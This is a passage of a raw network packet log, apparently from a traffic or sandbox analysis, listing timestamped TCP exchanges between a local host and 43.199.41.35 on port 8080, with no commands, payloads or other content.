                                                                                                                                                        Nov 25, 2024 11:10:19.517298937 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.517333984 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.517345905 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.518112898 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.518151999 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.518220901 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.519007921 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.519051075 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.519090891 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.519916058 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.519954920 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.520004034 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.520787954 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.520884991 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.520903111 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.521665096 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.521724939 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.521780968 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.522547960 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.522600889 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.522650957 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.523418903 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.523521900 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.523571014 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.524315119 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.524353981 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.524440050 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.525232077 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.525305033 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.525319099 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.526098967 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.526206017 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.526222944 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.526981115 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.527103901 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.527137995 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.527863026 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.527929068 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.527970076 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.528718948 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.528763056 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.528826952 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.529649019 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.529710054 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.529721022 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.530536890 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.530605078 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.530612946 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.531522036 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.531555891 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.531606913 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.532356977 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.532426119 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.532466888 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.533216000 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.533286095 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.533325911 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.534089088 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.534158945 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.534200907 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.534925938 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.534972906 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.638827085 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.638916016 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.639014006 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.639100075 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.639328957 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.639374018 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.639410019 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.640192032 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.640328884 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.640343904 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.641222954 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.641283035 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.641299009 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.641979933 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.642038107 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.642087936 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.642877102 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.642911911 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.642961025 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.643750906 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.643840075 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.668194056 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.668342113 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.668421984 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.668494940 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.668644905 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.668729067 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.669399023 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.669500113 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.669631958 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.670288086 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.670492887 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.670550108 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.671281099 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.671297073 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.671335936 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.672137022 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.672163010 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.672224045 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.672950983 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.673048019 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.673126936 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.673816919 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.673923016 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.673986912 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.674702883 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.674933910 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.674993038 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.675710917 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.675724983 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.675766945 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.695369005 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.695461988 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.695636034 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.695667982 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.695769072 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.695820093 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.696353912 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.696444035 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.696515083 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.697242975 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.697258949 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.697350979 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.697740078 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.697858095 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.697942019 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.698662043 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.698714018 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.698826075 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.699502945 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.699642897 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.699719906 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.700428963 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.700510979 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.700556040 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.701286077 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.701390028 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.701438904 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.702126026 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.702267885 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.702347994 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.703099012 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.703229904 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.703320026 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.704035044 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.704049110 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.704170942 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.704827070 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.705008984 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.705125093 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.705704927 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.705856085 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.705938101 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.706671953 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.706759930 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.706815004 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.707554102 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.707598925 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.707648039 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.708417892 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.708431005 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.708471060 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.709245920 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.709376097 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.709482908 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.710122108 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.710231066 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.710335970 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.711189032 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.711262941 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.711330891 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.711891890 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.712048054 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.712116003 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.712770939 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.713022947 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.713082075 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.713762045 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.713779926 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.713834047 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.714554071 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.714662075 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.714839935 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.715504885 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.715621948 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.715790033 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.716303110 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.716459036 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.716536045 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.717276096 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.717363119 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.717428923 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.718107939 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.718215942 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.718317986 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.719033003 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.719147921 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.719223976 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.719871998 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.719988108 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.720057964 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.720788956 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.720956087 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.721010923 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.721714020 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.721801996 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.721909046 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.722538948 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.722651005 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.722695112 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.723491907 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.723561049 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.723618031 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.724363089 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.724375963 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.724416971 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.725188017 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.725310087 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.725487947 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.726119041 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.726274014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.726320982 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.726913929 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.776629925 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.832040071 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.832057953 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.832117081 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.832407951 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.832461119 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.832524061 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.833410978 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.833482027 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.833550930 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.834338903 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.834492922 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.834556103 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.835222960 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.835347891 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.835469961 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.836004019 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.836213112 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.836281061 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.836811066 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.836926937 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.836992025 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.860678911 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.860836983 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.860866070 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.860877991 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.860908031 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.860928059 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.861721039 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.861835003 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.861917973 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.862637043 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.862756014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.862838030 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.863498926 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.863580942 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.863679886 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.864377022 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.864643097 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.864767075 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.865240097 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.865360022 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.865437984 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.866174936 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.866312027 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.866404057 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.867028952 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.867115974 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.867196083 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.867949009 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.868002892 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.868047953 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.887458086 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.887537956 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.887615919 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.887815952 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.887984037 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.888035059 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.888700962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.888835907 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.888890028 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.889612913 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.889738083 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.889807940 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.890537024 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.890616894 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.890664101 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.891369104 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.891513109 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.891567945 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.892276049 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.892380953 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.892436028 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.893156052 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.893256903 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.893305063 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.894038916 CET80804970543.199.41.35192.168.2.5
